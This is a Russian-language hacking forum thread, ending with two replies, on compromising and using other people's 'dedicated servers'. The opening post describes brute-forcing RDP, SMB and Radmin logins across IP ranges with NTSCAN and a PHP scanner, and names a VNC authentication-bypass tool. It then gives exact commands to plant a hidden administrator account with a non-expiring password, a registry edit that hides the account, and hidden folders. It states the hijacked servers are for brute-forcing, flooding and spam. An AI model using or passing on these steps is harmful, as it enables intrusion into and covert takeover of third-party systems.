Тема создана для всеобщего развития и обновлению\получению новых знаний в этой области. Я не учу вас ничего делать, а лишь преподношу теорию. Тема создана для новичков в этом деле или тех, кто хотел бы узнать что-то новое. Дедики. Что это и с чем его едят? Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. Как подключиться к дедику? Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если он установлен на дедике. На что требуется обращать внимание при выборе дедика? Канал, Память(RAM), Камень(процессор), ОС. Вот примеры: Цитата:Intel(R) Pentium(R) 4 CPU 2.80GHz, 3.00 GB of RAM\2003 os\1 gb Intel(R) Pentium(R) 4 CPU 3.20GHz, 2.00 GB of RAM\2003 os\100 mb Intel(R) Xeon(TM) CPU 3.06GHz\3.80 GB of RAM\2003 os\100 mb Для чего нужен дедик? Ну к примеру для брута, флуда, спама, мыла. Где достать дедик? Покупка. Взлом сервера. Раздачи. Как взломать дедик? Можно простыми TCP/IP сканерами насканить дедики Значит так, есть такая программа, которую в сети вам найти будет вполне по силам и называется она NTSCAN. Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей). Еще есть php сканер который написал gemaglabin. Его юзать легко просто даем на съедение ip-адресса, и ждем.(чесно сказать он сейчас пашет или нет но я юзал давно его помог) Какие порты надо сканить? TCP порты: 3389 - это порт, используемый программой Remote Desktop Порт 4899, который используется радмином - прогой Remote Administrator. Есть дедик, хочу добавить нового юзера. Как это реализовать? Открывай Administrative Tools => Computer Management => находим там вкладку Local Users and Groups => щёлкаем правой кнопкой мыши по вкладке Users => Create new user. net user имя_пользователя /add net start (stop) имя_службы Как замаскировать свое прибывание? Для начала нужно создать нам свою учётку. Потому что если мы будем сидеть через учётку админа, то это 90% что он нас пропалит! А нам этого не надо! Итак читай внимательно как сделать на чужом дедике свою учётку, и скрыть её! Делать это мы будем через командную строку! Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней: net user (тут пишем логин и пароль учётки которую мы будем создовать! Делаем это через пробел.) /add net localgroup Administrators (Тут указываем имя которое вы должны были указать в первой строке) /add net localgroup "Remote Desktop Users" (Тут тоже указываем имя которое указали в строке выше) /add net accounts /maxpwage:unlimited Допустим вы хотите создать учётную запись с именем admin, и паролем test. Тогда у вас должно вот что получиться: net user admin test /add net localgroup Administrators admin /add net localgroup "Remote Desktop Users" admin /add net accounts /maxpwage:unlimited Как скрыть себя среди других пользователей? Заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0. Дальше нам нужно скрыть папку с нашим акком, со всеми подкатологами, и файлами. Для этого идём в Cocuments and Settings и скрываем там нашу папку. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить) Дальше идём в C:WINDOWSsystem32 и создаём папку (название любое) Но вот и всё теперь ты можешь спокойно заходить на дедик под своим логином, и паролем. Теперь после того как мы вошли под своим логином и паролем нужно скрыть папку которую мы сделали. Это делается правой кнопкой мыши
Спасибо большое! А то в Гугле по поводу этой темы ничего не найти, на форумах тоже нет. От души, помог.
Ребят, я хотел спросить насчёт темы с 445 и 135 портами на официалке Майкрософт они говорят что устранили эту уязвимость в 8 и 10. Я произвел обнову, но при проверке netstat -a все равно отображает что порты в состоянии прослушки.Почему оно так отображается и можно ли использовать эти порты для брута дедиков, ведь по идее в 7 и ранее до сих пор эта проблема присутствует если юзер не закрыл порты сам?
